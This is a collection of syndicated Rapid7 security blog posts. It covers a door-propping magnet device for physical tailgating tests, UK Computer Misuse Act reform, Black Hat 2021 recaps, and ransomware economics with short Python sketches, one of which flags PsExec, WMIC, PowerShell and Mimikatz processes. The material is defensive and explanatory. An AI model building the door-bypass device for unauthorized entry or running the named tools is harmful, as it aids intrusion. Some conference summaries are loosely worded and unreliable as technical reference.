But first, of course, we want to caution that this is something that should only be used for legitimate purposes, when you have authorization or authority to do so. While we encourage other testers to try this out themselves and use it for customer engagements, this device is patent pending, and we request that you not manufacture, sell, or monetize it.

It’s it! What is it?

We start by placing our little door holder on the door frame, on the side of the door that opens:


When someone opens the door, it will push the long leaf of the hinge forward:


As the door opens further than the long leaf of the hinge, it falls back down behind the door:


And while the person who was exiting the door is hopefully on their merry way and not looking back to see if the door will close behind them, our little device will make sure it doesn’t:


More than one way to peel an orange

We’ve made a few versions of this using lock hasps. Another common hinge with a longer side would be your standard t-hinge. This one was made with a few bar-style neodymium magnets:


We’ve also made a miniature version using cup-style neodymium magnets:


Important tips

Neodymium magnets can slide around a good bit on smooth surfaces. Putting some grippy tape on the back of the magnet helps keep it from sliding or scratching paint; electrical tape and Gorilla Tape have both worked well.


Likewise, having some padding on the leaf that contacts the door is important to prevent it from scratching paint.


Countermeasures

This tool makes it easier to enter a building or secure area by tailgating. By simulating an attacker with a high level of skill and ingenuity, the tool can help reveal weaknesses in organizations’ physical security protocols — and what countermeasures might be more effective.

If you have an electronic access control system, consider configuring it to trigger alerts if a door has been left open for too long. But the best place to start is to make sure your physical security policies and security awareness training educates staff about tailgating, encourages them not to let someone follow them in, and emphasizes making sure that doors close behind them.
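The held-open alert is simple to reason about. Here's a minimal sketch of the logic (the 30-second threshold and the event shape are hypothetical, not any particular access control product's API):

```python
from typing import Optional

# Hypothetical policy: alert if a door stays open longer than this.
DOOR_HELD_OPEN_SECONDS = 30.0

def door_alert(opened_at: Optional[float], now: float,
               threshold: float = DOOR_HELD_OPEN_SECONDS) -> bool:
    """Return True when a door has been open past the allowed window.

    opened_at is the timestamp at which the door sensor reported "open"
    (None if the door is closed); now is the current timestamp.
    """
    return opened_at is not None and (now - opened_at) > threshold
```

A closed door never alerts; a door propped open by a device like the one described above eventually does, which is exactly the signal a monitored access control system needs.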


Reforming the UK’s Computer Misuse Act

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/12/reforming-the-uks-computer-misuse-act/

Reforming the UK’s Computer Misuse Act

The UK Home Office recently ran a Call for Information to investigate the Computer Misuse Act 1990 (CMA). The CMA is the UK’s anti-hacking law, and as Rapid7 is active in the UK and highly engaged in public policy efforts to advance security, we provided feedback on the issues we see with the legislation.

We have some concerns with the CMA in its current form, as well as recommendations for how to address them. Additionally, because Rapid7 has addressed similar issues relating to U.S. laws — particularly as relates to the U.S. equivalent of the CMA, the Computer Fraud and Abuse Act (CFAA) — for each section below, we’ve included a short comparison with U.S. law for those who are interested.

Restrictions on security testing tools and proof-of-concept code

One of the most concerning issues with the CMA is that it imperils dual-use open-source security testing tools and the sharing of proof-of-concept code.

Section 3A(2) of the CMA states:

(2) A person is guilty of an offence if he supplies or offers to supply any article believing that it is likely to be used to commit, or to assist in the commission of, an offence under section 1, 3 or 3ZA.

Security professionals rely on open-source and other widely available security testing tools that let them emulate the activity of attackers, and proof-of-concept exploit code helps organizations test whether their assets are vulnerable. These highly valued parts of robust security testing enable organizations to build defenses and understand the impacts of attacks.

Making these products open source helps keep them up-to-date with the latest attacker methodologies and ensures a broad range of organizations (not just well-resourced organizations) have access to tools to defend themselves. However, because they’re open source and widely available, these defensive tools could still be used by malicious actors for nefarious purposes.

The same issue applies to proof-of-concept exploit code. While the intent of the development and sharing of the code is defensive, there’s always a risk that malicious actors could access exploit code. But this makes the wide availability of testing tools all the more important, so organizations can identify and mitigate their exposure.

Rapid7’s recommendation

Interestingly, this is not an unknown issue — the Crown Prosecution Service (CPS) acknowledges it on their website. We’ve drawn from their guidance, as well as their Fraud Act guidelines, in drafting our recommended response, proposing that the Home Office consider modifying section 3A(2) of the CMA to exempt “articles” that are:

  • Capable of being used for legitimate purposes; and
  • Intended by the creator or supplier of the article to be used for a legitimate purpose; and
  • Widely available; unless
  • The article is deliberately developed or supplied for the sole purpose of committing a CMA offense.
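The structure of that proposed exemption is essentially a boolean predicate, which can be sketched as follows (an illustration of the logic only — not statutory language and not legal advice):

```python
def article_exempt(capable_of_legitimate_use: bool,
                   intended_for_legitimate_use: bool,
                   widely_available: bool,
                   sole_purpose_is_cma_offence: bool) -> bool:
    """Sketch of the proposed section 3A(2) exemption: all three
    conditions must hold, unless the article was deliberately developed
    or supplied for the sole purpose of committing a CMA offence."""
    if sole_purpose_is_cma_offence:
        return False
    return (capable_of_legitimate_use
            and intended_for_legitimate_use
            and widely_available)
```

Under this logic, a widely available open-source testing tool built for defensive use stays exempt even if attackers could misuse it, while purpose-built crimeware never qualifies.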

If you’re concerned about creating a loophole in the law that can be exploited by malicious actors, rest assured the CMA would still retain 3A(1) as a means to prosecute those who supply articles with intent to commit CMA offenses.

Comparison with the CFAA

This issue doesn’t arise in the CFAA; however, the U.S. is subject to various export control rules that also restrict the sharing of dual-use security testing tools and proof-of-concept code.

Chilling security research

This is a topic Rapid7 has commented on many times in reference to the CFAA and the Digital Millennium Copyright Act, which is the U.S. equivalent of the UK’s Copyright, Designs and Patents Act 1988.

Independent security research aims to reveal vulnerabilities in technical systems so organizations can deploy better defenses and mitigations. This offers a significant benefit to society, but the CMA makes no provision for legitimate, good-faith testing. While Section 1(1) acknowledges that you must have intent to access the computer without authorization, it doesn’t mention that the motive to do so must be malicious, only that the actor intended to gain access without authorization. The CMA states:

(1) A person is guilty of an offence if—

a) he causes a computer to perform any function with intent to secure access to any program or data held in any computer, or to enable any such access to be secured;

b) the access he intends to secure, or to enable to be secured, is unauthorised; and

c) he knows at the time when he causes the computer to perform the function that that is the case.

Many types of independent security research, including port scanning and vulnerability investigations, could meet that description. As frequently noted in the context of the CFAA, it’s often not clear what qualifies as authorization to access assets connected to the internet, and independent security researchers often aren’t given explicit authorization to access a system.
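That ambiguity is easier to appreciate when you see how little a basic port scan actually involves. At its core, checking a port is just an attempted TCP connection — a minimal sketch, not a scanning tool:

```python
import socket

def port_is_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Attempt a TCP connection and report whether it succeeded.

    This is all a basic "port scan" does for each port, which is why
    it's hard to say where "authorization" begins for a host that is
    already accepting connections from the public internet.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

The server answers the connection exactly as it would for any legitimate client; nothing in the exchange distinguishes "authorized" from "unauthorized" access, which is the crux of the legal uncertainty.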

It’s worth noting that neither the National Crime Agency (NCA) or the CPS seem to be recklessly pursuing frivolous investigations or prosecutions of good-faith security research. Nonetheless, the current legal language does expose researchers to legal risk and uncertainty, and it would be good to see some clarity on the topic.

Rapid7’s recommendation

Creating effective legal protections for good-faith, legitimate security research is challenging. We must avoid inadvertently creating a backdoor in the law that provides a defense for malicious actors or permits activities that can create unintended harm. As legislators consider options on this, we strongly recommend considering the following questions:

  • How do you determine whether research is legitimate and justified? Some considerations include whether sensitive information was accessed, and if so, how much – is there a threshold for what might be acceptable? Was any damage or disruption caused by the action? Did the researcher demand financial compensation from the technology manufacturer or operator?

For example, in our work on the CFAA, Rapid7 has proposed the following legal language to indicate what is understood by “good-faith security research.”

The term “good faith security research” means good faith testing or investigation to detect one or more security flaws or vulnerabilities in software, hardware, or firmware of a protected computer for the purpose of promoting the security or safety of the software, hardware, or firmware.

(A) The person carrying out such activity shall

(i) carry out such activity in a manner reasonably designed to minimize and avoid unnecessary damage or loss to property or persons;

(ii)  take reasonable steps, with regard to any information obtained without authorization, to minimize the information the person obtains, retains, and discloses to only that information which the person reasonably believes is directly necessary to test, investigate, or mitigate a security flaw or vulnerability;

(iii) take reasonable steps to disclose any security vulnerability derived from such activity to the owner of the protected computer or the Cybersecurity and Infrastructure Security Agency prior to disclosure to any other party

(iv) wait a reasonable amount of time before publicly disclosing any security flaw or vulnerability derived from such activity, taking into consideration the following:

(I) the severity of the vulnerability,

(II) the difficulty of mitigating the vulnerability,

(III) industry best practices, and

(IV) the willingness and ability of the owner of the protected computer to mitigate the vulnerability;

(v) not publicly disclose information obtained without authorization that is

(I) a trade secret without the permission of the owner of the trade secret; or

(II) the personally identifiable information of another individual, without the permission of that individual; and

(vi) does not use a nonpublic security flaw or vulnerability derived from such activity for any primarily commercial purpose prior to disclosing the flaw or vulnerability to the owner of the protected computer or the [government vulnerability coordination body].

(B) For purposes of subsection (A), it is not a public disclosure to disclose a vulnerability or other information derived from good faith security research to the [government vulnerability coordination body].

  • What happens if a researcher does not find anything to report? Some proposals for reforming the CMA have suggested requiring coordinated disclosure as a predicate for a research carve-out. This only works if the researcher actually finds something worth reporting. What happens if they do not? Is the research then not defensible?
  • Are we balancing the rights and safety of others with the need for security? For example, easing restrictions for threat intel investigators and security researchers may create a misalignment with existing privacy legislation. This may require balancing controls to protect the rights and safety of others.

The line between legitimate research and hack back

In discussions on CMA reform, we often hear the chilling effect on security research being lumped in with arguments for expanding authorities for threat intelligence gathering and operations. The latter sound alarmingly like requests for private-sector hack back (despite assertions otherwise). We believe it is critical that policymakers understand the distinction between acknowledging the importance of good-faith security research on the one hand and authorizing private-sector hack back on the other.

We understand private-sector hack back to mean an organization taking intrusive action against a cyber-attacker on technical assets or systems not owned or leased by the entity taking action or their client. While threat intel campaigners may disclaim hack back, in asking for authorization to take intrusive action on third-party systems — whether to better understand attacks, disrupt them, or even recapture lost data — they’re certainly satisfying the description of hack back and raising a number of concerns.

Rapid7 is strongly opposed to private-sector hack back. While we view both independent, good-faith security research and threat intelligence investigations as critical for security, we believe the two categories of activity need separate and distinct legal restrictions.

Good-faith security research is typically performed independently of manufacturers and operators in order to identify flaws or exposures in systems that provide opportunities for attackers. The goal is to remediate or mitigate these issues so that we reduce opportunities for attackers and decrease the risk for technology users. These activities often need to be undertaken without authorization to avoid blowback from manufacturers or operators that prioritize their reputation or profit above the security of their customers.

This activity is about protecting the safety and privacy of the many, and while researchers may take actions without authorization, they only do so on the technology of those ultimately responsible for both creating and mitigating the exposure. Without becoming aware of the issue, the technology provider and their users would continue to be exposed to risk.

In contrast, threat intel activities that involve interrogating or interacting with third-party assets prioritize the interests of a specific entity over those of other potential victims, whose compromised assets may have been leveraged in the attack. While threat intelligence can be very valuable in helping us understand how attackers behave — which can help others identify or prepare for attacks — data gathering and operations should be limited to assessing threats to assets that are owned or operated by the authorizing entity, or to non-invasive activities such as port scanning. More invasive activities can result in unintended consequences, including escalation of aggression, disruption or destruction for innocent third parties, and a quagmire of legal liability.

Because cyber attacks are criminal activity, if more investigation is needed, it should be undertaken with appropriate law enforcement involvement and oversight. We see no practical way to provide appropriate oversight or standards for the private sector to engage in this kind of activity.

Comparison to the CFAA

This issue also arises in the CFAA. In fact, it's exacerbated by the CFAA enabling private entities to pursue civil causes of action, which means technology manufacturers and operators can seek to apply the CFAA in private cases against researchers. This is often done to protect corporate reputations, likely at the expense of technology users who are being exposed to risk. These private civil actions chill security research and account for the vast majority of CFAA cases and lawsuit threats focused on research. One of Rapid7's recommendations to the UK Home Office was that the CMA should not be updated to include civil liability.

Washington State has helped protect good-faith security research in its Cybercrime Act (Chapter 9A.90 RCW), which both addresses the issue of defining authorization and exempts white-hat security research.

It’s also worth noting that the U.S. has an exemption for security research in Section 1201 of the Digital Millennium Copyright Act (DMCA). It would be good to see the UK government consider something similar for the Copyright, Designs and Patents Act 1988.

Clarifying authorization

At its core, the CMA effectively operates as a law prohibiting digital trespass and hinges on the concept of authorization. Four of the five classes of offenses laid out in the CMA involve “unauthorized” activities:

1. Unauthorised access to computer material.

2. Unauthorised access with intent to commit or facilitate commission of further offences.

3. Unauthorised acts with intent to impair, or with recklessness as to impairing, operation of computer, etc.

3ZA. Unauthorised acts causing, or creating risk of, serious damage.

Unfortunately, the CMA does not define authorization (or the lack thereof), nor detail what authorization should look like. As a result, it can be hard to know with certainty where the legal line is truly being drawn in the context of the internet, where many users don’t read or understand lengthy terms of service, and data and services are often publicly accessible for a wide variety of novel uses.

Many people take the view that if something is accessible in public spaces on the internet, authorization to access it is inherently granted. In this view, the responsibility lies with the owner or operator to ensure that if they don’t want to grant access to something, they don’t make it publicly available.

That being the case, the question becomes how systems owners and operators can indicate a lack of authorization for accessing systems or information in a way that scales, while still enabling broad access and innovative use of online services. In the physical world, we have an expectation that both public and private spaces exist. If a space is private and the owners don’t want others to access it, they can indicate this through signage or physical barriers (walls, fences, or gates). Currently, there is no accepted, standard way for owners and operators to set out a “No Trespassing” sign for publicly accessible data or systems on the internet that truly serves the intended purpose.

Rapid7’s recommendation

While a website’s Terms of Service (TOS) can be legally enforceable in some contexts, in our opinion the Home Office should not take the position that violations of TOS alone qualify as “unauthorized acts.” TOS are almost always ignored by the vast majority of internet users, and ordinary internet behavior may routinely violate TOS (such as using a pseudonym where a real name is required).

Reading TOS also does not scale for internet-wide scanning, as in the case of automated port scanning and other services that analyze the status of millions of publicly accessible websites and online assets. In addition, if TOS is “authorization” for the purposes of the CMA, it gives the author of the TOS the power to define what is and isn’t a hacking crime under CMA section 1.

To address this lack of clarity, the CMA needs a clearer explanation of what constitutes authorization for accessing technical systems or information through the internet and other forms of connected communications.

Comparison with the CFAA

This issue absolutely exists with the CFAA and is at the core of many of the criticisms of the law. Multiple U.S. cases have rejected the notion that TOS violations alone qualify as "exceeding authorization" under the CFAA, creating a split in the courts. The U.S. Supreme Court's recent decision in Van Buren v. United States confirmed TOS is an insufficient standard, noting that if TOS violations alone qualify as unauthorized acts for computer crime purposes, "then millions of otherwise law-abiding citizens are criminals."

Next steps

We hope the Home Office will take these concerns into consideration, both in terms of ensuring the necessary support for security testing tools and security research, and also in being cautious not to go so far with authorities that we open the door to abuses. We’ll continue to engage on these topics wherever possible to help policymakers navigate the nuances and keep advancing security.

You can read Rapid7’s full response to the Home Office’s CFI or our detailed CMA position.


Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/08/06/black-hat-recap-2/

Black Hat 2021: Rapid7 Experts Share Key Day 2 Takeaways

Here we are again, back for another day of Rapid7 expert debriefings and analysis for some of the most talked-about Black Hat sessions of this year. So without further delay, let’s take it away!

Get more DEF CON 2021 insights from our Research team on Tuesday, August 10

Sign up for our What Happened in Vegas webinar

Detection and Response




Key takeaways

  • How do human behaviors — learned or learning — factor into incident response? Depending on the number of stakeholders involved, your team may be operating under varying degrees of action bias: are speedy actions being prioritized for vulnerabilities that don't actually present a high-risk profile? Is speed even possible if mitigating actions must suddenly be learned? Vendors have caught on, practicing "security theater": peddling solutions to problems that might not present real risks.
  • Tangential to the previous topic, a question arises when exploring the weaponization of C2 channels: Due to the unlikelihood of an attack via, say, LDAP attributes when establishing C2, does it make sense to roll out an entirely new detection-and-response plan? Many different conditions must be met for an attacker to gain access in the wild, but teams might already have similar responses in place, on the off chance it happens.
  • Zooming out to a topic with broader public appeal, let’s consider how companies use — and abuse — our personal data. An 18-month test run by a professor and a group of students at Virginia Tech revealed how unlikely it is we’ll be able to predict which companies will abuse personal information after someone, say, creates login credentials for a TikTok account and the company launches cookie tracking for that person.

Vulnerability Risk Management




Key takeaways

  • Are Microsoft Exchange Servers creating an entirely new attack surface via Client Access Services (CAS)? Exchange architecture is incredibly complex, so it contains multitudes when it comes to vulnerabilities. CAS ties front-end and back-end services together, receiving the front-end request through a variety of protocols, including some extremely geriatric ones like POP3 and IMAP4. These legacy protocols are contributing to expanded attack surfaces.
  • Vulnerability Exploitability eXchange (VEX) helps teams rethink security advisories and what it means to be vulnerable. Essentially, it enables software providers to communicate they’re not affected by a vulnerability. Two advantages of VEX are 1) that creation and management of vulnerabilities are automated, and 2) that its results are machine-readable.  
  • Open-source software (OSS) is incredible… and incredibly vulnerable. There are so many risks with OSS that a vendor might even put off patching a vulnerability — for whatever business reason — if alerted to it. There’s currently no mechanism to secure so many classes of vulnerabilities in OSS, but maybe there should be. Researchers should work together to create those class-eliminating mechanisms, ultimately reducing the lift when it comes to risk management.

Research and Policy




Key takeaways

  • What is Electromagnetic Fault Injection (EMFI)? It’s when hardware attackers use electromagnetism to hack hardware chips. When it comes to something like a car’s modern combustion engine, EMFI can be leveraged to change a vehicle’s performance, slithering past manufacturer-imposed security protocols. Some owners are beginning to “tune” chips with EMFI in order to push the limits of their vehicles.
  • There’s cause for concern that AI security products are simply repeating back to us the tables on which they were trained. If this is the case, can someone create more nefarious tables to sway AI security entities away from actual security? Attackers can now train explainable AI models on private data, turning them into the latest tool in their arsenals. Consider your attack surface expanded.
  • When companies export their technology beyond their own borders, it isn’t as easy as it sounds in a press release. Whereas policy constantly lagged behind technology, it’s starting to catch up as companies realize the cost of doing business with both digital authoritarians and digital democracies. Is proprietary tech compromised when entering a new country where it must adhere to each and every law imposed on it by local regulators?

Thanks for joining the Rapid7 team at another round of Black Hat debriefings. We hope to see you live and in person in Vegas next year. Until then, stay secure and stay safe!

And if you’re not ready to walk away from the table just yet, revisit our Day 1 takeaways, or sign up now to hear our Research team’s behind-the-scenes insights on DEF CON 2021 at the What Happened in Vegas webinar on Tuesday, August 10.

Slot Machines and Cybercrime: Why Ransomware Won’t Quit Pulling Our Lever

Post Syndicated from Erick Galinkin original https://blog.rapid7.com/2021/08/06/slot-machines-and-cybercrime-why-ransomware-wont-quit-pulling-our-lever/

Slot Machines and Cybercrime: Why Ransomware Won't Quit Pulling Our Lever

The casino floor at Bally's is a thrilling place, one that loads of hackers are familiar with from our time at DEF CON. One feature of these casinos is the unmistakable song of slots being played. Imagine a slot machine that costs a dollar to play and pays out $75 if you win. What probability of winning would it take for you to play?

Naively, I’d guess most people’s answers are around “1 in 75”, or maybe “1 in 74” if they want to turn a profit. One in 74 is a win probability of about 1.35%. At those odds, you turn a profit, on average, of $1 per 74 games. So how many times do you play? Probably not that many. You’re essentially playing for free, but an average profit of $1 per 74 pulls isn’t much to get excited about.

But what if that slot machine paid out about half the time, giving you $75 every other time you played? How many times would you play?
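To make the comparison concrete, here’s a quick sketch of the per-pull expected value of both hypothetical machines, using the odds and payouts from the thought experiment above:

```python
# Expected profit per pull: payout weighted by the odds of winning, minus the stake.
def ev_per_pull(win_probability: float, payout: float, cost: float = 1.0) -> float:
    """Average profit per play of a slot machine."""
    return win_probability * payout - cost

# Machine 1: pays $75 at roughly 1-in-74 odds -> about a penny of profit per pull.
print(round(ev_per_pull(1 / 74, 75.0), 4))  # 0.0135

# Machine 2: pays $75 about half the time -> $36.50 of profit per pull.
print(round(ev_per_pull(0.5, 75.0), 2))     # 36.5
```

The second machine is the one nobody would ever walk away from, which is exactly the point of the analogy that follows.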

This is the game that ransomware operators are playing.

Playing Against the Profiteers

Between Wannacry, the Colonial Pipeline hack, and the recent Kaseya incident, everyone is now familiar with supply chain attacks — particularly those that use ransomware. As a result, ransomware has entered the public consciousness, and a natural question is: why ransomware? From an attacker’s perspective, the answer is simple: why not?

For the uninitiated, ransomware is a family of malware that encrypts files on a system and demands a payment to decrypt the files. Proof-of-concept ransomware has existed since at least 1996, but the attack vector really hit its stride with CryptoLocker’s innovative use of Bitcoin as a payment method. This allowed ransomware operators to perpetrate increasingly sophisticated attacks, including the 2017 WannaCry attack — the effects of which, according to the ransomware payment tracker Ransomwhere, are still being felt today.

Between the watering hole attacks and exploit kits of the Angler EK era and the recent spate of ransomware attacks targeting high-profile companies, the devastation of ransomware is being felt even by those outside of infosec. The topic of whether or not to pay ransoms — and whether or not to ban them — has sparked heated debate and commentary from folks like Tarah Wheeler and Ciaran Martin at the Brookings Institution, the FBI, and others in both industrial and academic circles. One noteworthy academic paper by Cartwright, Castro, and Cartwright uses game theory to ask the question of whether or not to pay.

Ransomware operators aren’t typically strategic actors with a long-term plan; rather, they’re profiteers who seek targets of opportunity. No target is too big or too small for these groups. Although these analyses differ in the details, they get the message right — if the ransomware operators don’t get paid, they won’t want to play the game anymore.

Warning: Math Ahead

According to Kaspersky, 56% of ransomware victims pay the ransom. Most other analyses put it around 50%, so we’ll use Kaspersky’s. In truth, it’s unlikely we have an accurate number for this, as many organizations specifically choose to pay the ransom in order to avoid public exposure of the incident.

If a ransomware attack costs some amount of money to launch, succeeds some percentage of the time, and gets paid some percentage of the time, the amount of money made from each attack is:

expected value = P(success) × P(payment) × (ransom amount) − (cost of attack)

We call this the expected value of an attack.

It’s hard to know how many attacks are launched — and how many of those launched attacks actually land. Attackers use phishing, RDP exploits, and all kinds of other methods to gain initial access. For the moment, let’s ignore that problem and assume that every attack that gets launched lands. Ransomware that lands on a machine is successful about 54% of the time, and the probability of payment is 56%. Together, this means that the expected value of an attack is:

expected value = 0.54 × 0.56 × ransom − cost = 0.3024 × ransom − cost

Given the average ransom payment is up to $312,493 as of 2020 — or using Sophos’s more conservative estimate, $170,404 — that means ransomware authors are turning a profit as long as the cost of an attack is less than $94,497.88 (or the more conservative $51,530.17). Based on some of the research that’s been done on the cost of attacks, where high-end estimates put it at around $4,200, we can start to see how a ransom of almost 75 times the cost to play becomes an incentive.
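The arithmetic above can be sketched in a few lines. The probabilities and dollar figures are the ones cited in this post (Kaspersky’s 56% payment rate, a 54% success rate, and a high-end $4,200 cost per attack), not independently verified numbers:

```python
# Expected profit of a single ransomware attack, per the article's figures.
P_SUCCESS = 0.54  # ransomware that lands encrypts successfully ~54% of the time
P_PAYMENT = 0.56  # Kaspersky: ~56% of victims pay the ransom

def attack_ev(ransom: float, cost: float) -> float:
    """Chance of success times chance of payment times ransom, minus attack cost."""
    return P_SUCCESS * P_PAYMENT * ransom - cost

# Average ransom figures cited above, against a high-end $4,200 attack cost.
for ransom in (312_493, 170_404):
    print(f"${attack_ev(ransom, 4_200):,.2f}")  # $90,297.88 then $47,330.17
```

Either way, the attacker’s expected profit per attack dwarfs the cost of launching one.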

In fact, because expected values are linear and the expected value is only for one play, we can see pretty quickly that in general, two attacks will give us double the value of one, and three will triple it. This means that if we let our payout be a random variable X, a ransomware operator’s expected value over an infinite number of attacks is… infinite.

E[X₁ + X₂ + X₃ + …] = E[X] + E[X] + E[X] + … = ∞

Obviously, an infinite number of ransomware attacks is not reasonable, and there is a limit to the amount that any individual or business can pay over time before they just give up. But from an ideal market standpoint, the message is clear: While ransoms are being paid at these rates and sizes, the problem is only going to grow. Just like you’d happily play a slot machine that paid out almost half the time, attackers are happy to play a game that gets them paid roughly 30% of the time, especially because the profits are so large.

Removing Incentives

So why would ransomware operators ever stop if, in an idealized model, there’s potentially infinite incentive to keep playing? A few reasons:

  1. The value of payments is lower
  2. The cost becomes prohibitive
  3. The attacks don’t work
  4. Nobody is paying

Out of the gate, we can more or less dismiss the notion that payment values will get lower. The only way to lower the value of the payment is to lower the value of Bitcoin to nearly zero. We’ve seen attempts to ban and regulate cryptocurrencies, but none of those have been successful.

In terms of the monetary cost, this is also pretty much a dead end for us. Even if we could remove all of the efficiencies and resilience of darknet markets, that would only remove the lowest-skill attackers from the equation. Other groups would still be capable of developing their own exploits and ransomware.

Ultimately, what our first two options have in common is that they deal, in a pretty direct way, with adversary capabilities. They leave room for adversaries to adapt and respond, ultimately trying to affect things that are in the control of attackers. This makes them much less desirable avenues for response.

So let’s look at the things that victims have control over: defenses and payments.

Defending Against Ransomware

Defending against ransomware is quite similar to defending against other attack types. In general, ransomware is not the first-stage payload delivered by an exploit; instead, it’s dropped by a loader. So the name of the game is to prevent code execution on endpoints. As security professionals, this is something we know quite well.

For ransomware, the majority of attacks come via a handful of vectors, which will be familiar to most security practitioners:

  • Phishing
  • Vulnerable services
  • Weak passwords, especially on Remote Desktop Protocol
  • Exploit kits

Many of these initial access vectors can be kept in check with user training, vulnerability scans, and sound patching practices. Once initial access is established, many ransomware operators use built-in tooling like WMI and PowerShell, utilities like PsExec, and frameworks like Cobalt Strike, in addition to commodity malware like Trickbot, to move laterally before hitting the entire network with ransomware.

Looking for these indicators of compromise is one way to limit the potential impact of ransomware. But of course, these techniques are hard to detect, and no organization is able to catch 100% of the bad things that are coming at them. So what do victims do when the worst happens?
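As a rough illustration of what hunting for these indicators can look like, here is a minimal sketch that flags process events matching well-known lateral-movement tooling. The event format and tool list are hypothetical; a real detection pipeline would use richer telemetry and behavioral rules, not bare process names:

```python
# Illustrative only: flag process events whose name matches common
# lateral-movement tooling. The event schema here is a made-up example.
SUSPECT_PROCESSES = {"psexec.exe", "wmic.exe", "powershell.exe", "mimikatz.exe"}

def flag_suspect_events(events: list[dict]) -> list[dict]:
    """Return the subset of events naming known lateral-movement tooling."""
    return [e for e in events if e.get("process", "").lower() in SUSPECT_PROCESSES]

sample = [
    {"host": "ws-042", "process": "PsExec.exe"},
    {"host": "ws-017", "process": "outlook.exe"},
]
print(flag_suspect_events(sample))  # flags only the PsExec event
```

Note that a name like powershell.exe is ubiquitous in legitimate administration, so in practice you would combine matches with context (parent process, command-line arguments, timing) rather than alert on names alone.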

Choosing Not to Pay

When ransomware attacks are successful, victims have two primary choices: pay or don’t. There are many follow-on decisions from each of these decisions, but the first and most critical decision (for the attacker) is whether or not to pay the ransom.

When people pay the ransom, they’re likely — though not guaranteed — to get their files back. However, because of the significant amount of first-stage implant and lateral-movement activity associated with ransomware attacks, there’s still a lot of incident response work to be done beyond the return of the files. For many organizations without a suitable off-site backup in place, paying may feel like an inevitable impact of this type of attack. As Tarah Wheeler pointed out, the payment is often something that can simply be written off as a business expense. Consequently, hackers get paid, companies write off the loss, and nobody learns a lesson.

As we discussed above, when you pay a ransom, you’re paying for the next attack, and according to reports from the UK’s NCSC, you may also be paying for human trafficking. None of us wants to be funding these attackers, but we want to protect our data. So how do we get away from paying?

As we mentioned before, preventing the attacks in the first place is the optimal outcome for us as defenders, but security solutions are never 100% effective. The easiest way not to pay is to have an off-site backup: you can invoke your normal incident response process with your data intact. In many cases, this isn’t any more expensive than paying, and you’re guaranteed to get your data back.

In some cases, a decrypter is available for the ransomware, which victims can use to restore their files without paying. Initiatives like the No More Ransom project make decrypters available for free, saving organizations significant sums they would otherwise spend on decryption keys.

Having a network configuration that makes lateral movement difficult will also reduce the “blast radius” of an attack and can help mitigate the spread. In these cases, you may be able to get away with reimaging a handful of employee laptops and accepting the loss. Ultimately, letting organizations write off the cost of backups instead of ransom payments would encourage sensible backup policies and discourage ransomware operators.

Why the Wheel Keeps Spinning

Ransomware remains a significant problem, and I hope we’ve demonstrated why: the incentives for everyone, including victims, are there to increase the number of ransomware attacks. Attackers who do more attacks will see more profits, which fund subsequent attacks. While victims can write off their payments, there’s no incentive to take steps to mitigate the impact of ransomware, so the problem will continue.

Crucially, ransomware attackers aren’t picky about their victims. They’re not nation-state actors who seek to target only the largest companies with the most intellectual property. Rather, they’re attackers of opportunity — their victim is anyone who lets their lever be pulled, and as long as the victims keep paying out often enough, attackers are happy to play.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Black Hat 2021: Rapid7 Experts Share Key Day 1 Takeaways

Post Syndicated from Dwayne A. Johnson original https://blog.rapid7.com/2021/08/05/black-hat-recap-1/


OK, no big deal, we know how this goes. Once again, many of us are attending Black Hat in a virtual capacity as COVID-19 meanders its way out of our lives. The good news is that there’s an actual live component again this year in Las Vegas, and that’s progress. Here’s hoping that next year the pandemic will be more firmly in the rearview and any remaining travel trepidation will be a “2021 thing.”    

So flip the on-switch to some neon lights if you got ‘em, and let’s get into what our Rapid7 experts thought were the biggest takeaways from a busy Day 1 of new tools, techniques, and up-to-the-minute information.

Want our daily Black Hat takeaways sent directly to your inbox?

Get started

Detection and Response




Key takeaways

  • Does it make sense for an organization to “roll its own SIEM”? Yes and no (because of course that’s the answer). For very specific use cases outside of the norm, it might make sense to start the often-herculean, cost-prohibitive task of building that cloud-native SIEM to best serve hyper-specific needs. But is it worth it to miss out on the high-quality, actionable intel a commercial vendor brings to the table?  
  • When it comes to distributed malware, attackers are bypassing traditional detection. Return Oriented Programming (ROP — pronounced “rope”) grants attackers a bypass route through initial access points to get onto an endpoint faster and more easily. However, the real endgame is to bypass that endpoint agent and hack the network at large.
  • Just how easy is it to hack a hotel? If you were the victim of a hotel hack, you might think a ghost had taken up residence in your room as your IoT-connected bed suddenly moves up and down. However, the proliferation of unprotected networks and IoT devices in modern hotels has created unprecedented opportunities for attackers to gain nefarious access. A back-to-basics approach might be the best way forward for the hospitality industry.

Vulnerability Risk Management




Key takeaways

  • Open Platform Communications (OPC) standards are a wondrous thing, allowing products across many industries to interact and exchange data efficiently. But is security a priority? When commercial vendors all along a supply chain start making their own customizations to the common legacy protocol, well, security isn’t so secure anymore.
  • Find an Active Directory certificate vulnerability? Good luck getting it patched. These configuration-related flaws are ones that larger organizations might be hesitant to acknowledge. Check out this (extremely long, but informative) whitepaper on the subject — and the accompanying blog — from SpecterOps.
  • Printer vulnerabilities aren’t paper-thin. Windows Printer Spooler can offer up an attack surface that leads to an instance like the PrintDemon incident. Some of the larger vulnerabilities see attackers and exploit authors leveraging printer path names.  

Research and Policy




Key takeaways

  • Let’s talk lasers — specifically, how attackers can use them to exploit vulnerabilities in hardware like bitcoin wallets. One would hope that the key material they’re storing in that wallet is secure. However, with a laser you can “look through” a silicon chip to confuse the CPU and bypass security checks.  
  • Wondering how future information wars will be fought? By bots. Advanced bots, that is — those that leverage Generative Pre-Trained Transformer (GPT) language models like GPT-3. With this powerful tool, a small group of people could generate misinformation at scale, quickly spinning up thousands of fake social accounts creating individual posts that sound like actual human language. That’s scary.  
  • As far as we know, AI cannot yet be arrested. However, threat actors can still run afoul of digital crime laws like the Computer Fraud and Abuse Act (CFAA) when they employ adversarial machine learning. This “poisoned data” results in systems learning things they shouldn’t. Current federal and state computer-crime laws need to reflect these more sophisticated AI attack methods so that, you know, the machines don’t win.  

We’ll see you right back here tomorrow for Black Hat Day 2 insights and takeaways from the Rapid7 team!


PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/


